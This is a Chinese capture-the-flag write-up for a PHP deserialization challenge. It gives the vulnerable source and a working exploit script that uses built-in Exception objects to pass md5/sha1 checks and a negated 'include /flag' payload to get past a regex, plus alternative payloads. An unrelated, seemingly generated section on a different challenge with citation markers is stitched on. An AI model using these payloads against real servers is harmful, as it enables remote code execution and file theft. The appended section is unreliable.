[极客大挑战 2020]Greatphp (php 内置类)

<?php
error_reporting(0);
class SYCLOVER {
    public $syc;
    public $lover;

    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }
           
        }
    }
}

if (isset($_GET['great'])){
    unserialize($_GET['great']);
} else {
    highlight_file(__FILE__);
}

?>

发现第一个if是md5和sha1函数的漏洞,用一个数组就可以绕过去,但是命令里面eval()syc这个参数又得被执行,所以不能是数组。

这时候只能想到php中的内置类,也就是原生类。

Error:用于PHP7、8,开启报错。

Exceotion:用于PHP5、7、8,开启报错。会自动调用__tostring

Error是所有PHP内部错误类的基类,该类是在PHP 7.0.0 中开始引入的

PHP7中,可以在echo时触发__toString,来构造XSS。

实验发现除了报错的行数不同其他都一样 ,所以我们把他们放在一行不久可以绕过第一个if

 这里本来是用Exception构造,可是报错,因为我的php版本是5.41的然后没有Error,正在我想为什么报错的时候突然想到了,因为php7版本才引入PHP7中,可以在echo时触发__toString所以换了一个版本。

<?php
 
class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ){
           if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){
               eval($this->syc);
           } else {
               die("Try Hard !!");
           }
 
        }
    }
}
 
$str = "?><?=include~".urldecode("%D0%99%93%9E%98")."?>";
/* 
或使用[~(取反)][!%FF]的形式,
即: $str = "?><?=include[~".urldecode("%D0%99%93%9E%98")."][!.urldecode("%FF")."]?>";    
 
$str = "?><?=include $_GET[_]?>"; 
*/
$a=new Exception($str,1);$b=new Exception($str,2);
$c = new SYCLOVER();
$c->syc = $a;
$c->lover = $b;
echo(urlencode(serialize($c)));
 
?>

实验发现成功 ,Exception可以换成Error是一样的

绕过第一个if是因为后面第二个参数的不同,举例子

相同以后进不去if.空的界面 

 

"?><?=include~".urldecode("%D0%99%93%9E%98")."?>";

这里解释以下,为什么要?>闭合掉,因为前面可能会有一些报错的信息,所以可以先闭合掉前面的东西,然后再来包含后面的是取反,因为在链里面所以需要用到解码,不用编码绕不过去正则,里面是/flag因为刷题多了都在根目录下面,不在的话正能一步步尝试。

### 关于2019极客挑战中的PHP题目解析 #### 题目描述与目标 在2019年的极客挑战中,存在一道涉及PHP反序列化的安全漏洞利用问题。该题目的核心在于理解如何通过构造特定的输入来触发程序内部逻辑错误从而获取敏感信息或执行恶意操作。 给定的PHP类`Name`定义如下[^1]: ```php <?php class Name{ private $username = 'admin'; private $password = 100; } $select = new Name(); $res = serialize(@$select); echo $res; ?> ``` 此段代码展示了对象被序列化后的字符串形式。为了完成挑战,参赛者需要了解另一个脚本文件的内容,其中包含了对来自HTTP请求参数`select`的数据进行了未经验证直接反序列化的处理过程[^2]: ```php <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> ``` 当上述两部分结合起来考虑时,可以发现如果能够控制传递给`$_GET['select']`变量的具体值,则可以通过精心设计的对象结构绕过权限校验机制并最终获得flag。具体来说就是满足条件`username==='admin'&&password==100`即可成功读取标志位数据[^3]。 #### 利用方法概述 要实现这一攻击向量,参与者需构建一个合法但具有特殊属性的对象表示法作为查询字符串的一部分发送至服务器端口。由于PHP允许自定义类名及其成员变量名称,在不违反语法的前提下几乎可以任意指定这些组件;因此只要能正确模拟原始类实例的状态就能顺利通过身份验证检查。 例如,下面是一个可能用于测试的有效载荷(payload),它模仿了原生`Name`类的样子: ```php O:4:"Name":2:{s:11:"\0Name\0username";s:5:"admin";s:11:"\0Name\0password";i:100;} ``` 这里的关键点在于使用`\0`字符分隔符以及适当调整字段长度以匹配预期格式。一旦这样的字符串被提交到含有漏洞的应用程序处,就有可能导致意外行为的发生——即让应用程序误认为接收到的是由其自身创建出来的正常对象而非外部注入物。 #### 安全建议 为了避免此类风险,开发者应当遵循最佳实践原则,比如始终对外部输入做严格过滤和消毒工作、避免不必要的序列化/反序列化进程间通信方式等措施加以防范潜在威胁。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值